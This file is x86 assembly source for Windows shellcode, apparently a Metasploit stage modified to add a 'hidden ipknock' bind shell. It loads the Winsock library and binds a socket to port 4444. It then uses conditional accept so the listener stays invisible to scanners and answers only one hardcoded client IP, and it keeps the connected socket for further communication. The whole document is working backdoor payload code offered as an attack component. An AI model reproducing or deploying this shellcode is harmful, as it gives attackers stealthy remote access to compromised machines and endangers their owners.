;-----------------------------------------------------------------------------; ; Original Shellcode: Stephen Fewer (stephen_fewer@harmonysecurity.com) ; Modified version to add hidden ipknock bind shell support: Borja Merino (bmerinofe@gmail.com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 ; Version: 1.0 (December 2014) ;-----------------------------------------------------------------------------; [BITS 32] ; Input: EBP must be the address of 'api_call'. ; Output: EDI will be the newly connected clients socket ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0) bind_tcp: push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. push 0x5F327377 ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) call ebp ; LoadLibraryA( "ws2_32" ) mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this stuct push eax ; push the wVersionRequested parameter push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" ) call ebp ; WSAStartup( 0x0190, &WSAData ); push eax ; if we succeed, eax wil be zero, push zero for the flags param. push eax ; push null for reserved parameter push eax ; we do not specify a WSAPROTOCOL_INFO structure push eax ; we do not specify a protocol inc eax ; push eax ; push SOCK_STREAM inc eax ; push eax ; push AF_INET push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this xor ebx, ebx ; Clear EBX push ebx ; bind to push 0x5C110002 ; family AF_INET and port 4444 mov esi, esp ; save a pointer to sockaddr_in struct push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused) push esi ; pointer to the sockaddr_in struct push edi ; socket push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" ) call ebp ; bind( s, &sockaddr_in, 16 ); ; Hidden ipknock Support ---------- push 0x1 ; size, in bytes, of the buffer pointed to by the "optval" parameter push esp ; optval: pointer to the buffer in which the value for the requested option is specified push 0x3002 ; level at which the option is defined: SOL_SOCKET push 0xFFFF ; the socket option for which the value is to be set: SO_CONDITIONAL_ACCEPT push edi ; socket descriptor push 0x2977A2F1 ; hash( "ws2_32.dll", "setsockopt" ) call ebp ; setsockopt(s, SOL_SOCKET, SO_CONDITIONAL_ACCEPT, &bOptVal, 1 ); push ebx ; backlog push edi ; socket push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" ) call ebp ; listen( s, 0 ); condition: push ebx ; dwCallbackData (ebx = 0, no data needed for the condition function) call wsaaccept ; push the start of the condition function on the stack mov eax, DWORD [esp+4] ; mov eax, DWORD [eax+4] ; mov eax, DWORD [eax+4] ; get the client IP returned in the stack sub eax, 0x2101A8C0 ; compare the client IP with the IP allowed jz equal ; if equal, eax = 0 xor eax, eax inc eax ; if not equal, eax = 1 equal: mov DWORD [ebp+84], eax ; save the value of eax out of the scope of the callback. ; This value will be read it after calling WSAaccept since ; WSAaccept would always return FFFFFFFF when the IP is spoofed retn 0x20 ; some stack alignment needed to return to mswsock wsaaccept: push ebx ; length of the sockaddr = nul push ebx ; struct sockaddr = nul push edi ; socket descriptor push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" ) call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0) cmp DWORD [esp+4], 0 jnz condition ; Check if the IP knocked is allowed inc eax jnz connection ; Check if the 3-Way Handshake is successfully established push ebx ; dwCallbackData (ebx = 0, no data needed for the condition function) push ebx ; fnCondition = 0 jmp wsaaccept jz condition ; if error (eax = -1) jump to condition function to wait for another connection connection: dec eax ; restore eax push edi ; push the listening socket to close xchg edi, eax ; replace the listening socket with the new connected socket for further comms push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" ) call ebp ; closesocket( s );